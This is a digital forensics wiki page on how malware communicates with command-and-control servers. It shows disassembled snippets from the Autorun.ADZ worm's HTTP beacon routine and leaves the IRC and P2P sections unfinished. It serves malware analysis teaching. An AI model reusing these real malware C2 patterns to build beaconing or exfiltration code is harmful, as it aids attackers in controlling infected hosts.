Category:Digital-Forensics/Computer-Forensics/Communication-Channels

From aldeid
Communication Channels

Description

Most malware communicates with a remote host for various tasks:

  • check whether updates are available
  • alert the attacker that the host is infected
  • receive external commands, e.g. synchronize multiple infected hosts through a Command & Control (C&C) server to perform a Denial of Service (DoS) attack
  • leak data (e.g. passwords, credit card numbers, network architecture, confidential documents)

Let's review some of the communication channels used for this command and control traffic.

HTTP

Description

INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Steps

The code below is an extract from Worm:Win32/Autorun.ADZ available for download here.

Step: Create HTTP connection
Functions: InternetOpenA, InternetConnectA
Example:

.text:00403AF6                 push    ebx             ; dwFlags
.text:00403AF7                 push    ebx             ; lpszProxyBypass
.text:00403AF8                 push    ebx             ; lpszProxy
.text:00403AF9                 push    4               ; dwAccessType
.text:00403AFB                 push    offset szAgent  ; "74978o6rpp6p19836n17n3p2pq0840o0"
.text:00403B00                 call    ds:InternetOpenA
.text:00403B06                 mov     [ebp+158h+var_180], eax
.text:00403B09                 cmp     eax, ebx
.text:00403B0B                 jz      loc_403C6E
.text:00403B11                 push    ebx             ; dwContext
.text:00403B12                 push    ebx             ; dwFlags
.text:00403B13                 push    3               ; dwService
.text:00403B15                 push    ebx             ; lpszPassword
.text:00403B16                 push    ebx             ; lpszUserName
.text:00403B17                 push    50h             ; nServerPort
.text:00403B19                 lea     ecx, [ebp+158h+szServerName]
.text:00403B1F                 push    ecx             ; lpszServerName
.text:00403B20                 push    eax             ; hInternet
.text:00403B21                 call    ds:InternetConnectA

Step: Build HTTP request
Functions: HttpOpenRequestA, HttpAddRequestHeadersA
Example:

.text:00403B32                 push    ebx             ; dwContext
.text:00403B33                 push    8468C200h       ; dwFlags
.text:00403B38                 push    ebx             ; lplpszAcceptTypes
.text:00403B39                 push    ebx             ; lpszReferrer
.text:00403B3A                 push    offset szVersion ; "HTTP/1.0"
.text:00403B3F                 lea     ecx, [ebp+158h+szObjectName]
.text:00403B45                 push    ecx             ; lpszObjectName
.text:00403B46                 push    offset szVerb   ; "POST"
.text:00403B4B                 push    eax             ; hConnect
.text:00403B4C                 call    ds:HttpOpenRequestA

[SNIP]

.text:00403B69                 push    20000000h       ; dwModifiers
.text:00403B6E                 push    [ebp+158h+dwHeadersLength] ; dwHeadersLength
.text:00403B71                 push    eax             ; lpszHeaders
.text:00403B72                 push    [ebp+158h+hInternet] ; hRequest
.text:00403B75                 call    ds:HttpAddRequestHeadersA

Step: Send HTTP request
Functions: HttpSendRequestA
Example:

.text:00403C4F                 push    [ebp+158h+dwOptionalLength] ; dwOptionalLength
.text:00403C52                 push    edi             ; lpOptional
.text:00403C53                 push    ebx             ; dwHeadersLength
.text:00403C54                 push    ebx             ; lpszHeaders
.text:00403C55                 push    [ebp+158h+hInternet] ; hRequest
.text:00403C58                 call    ds:HttpSendRequestA

Step: Read response
Functions: InternetReadFile
Example:

.text:00403FA4                 lea     ecx, [ebp+148h+dwNumberOfBytesRead]
.text:00403FA7                 push    ecx             ; lpdwNumberOfBytesRead
.text:00403FA8                 push    [ebp+148h+lpOptional] ; dwNumberOfBytesToRead
.text:00403FAB                 mov     [ebp+148h+lpMem], eax
.text:00403FAE                 push    eax             ; lpBuffer
.text:00403FAF                 push    [ebp+148h+hInternet] ; hFile
.text:00403FB2                 call    ds:InternetReadFile

IRC

INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

P2P

INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.
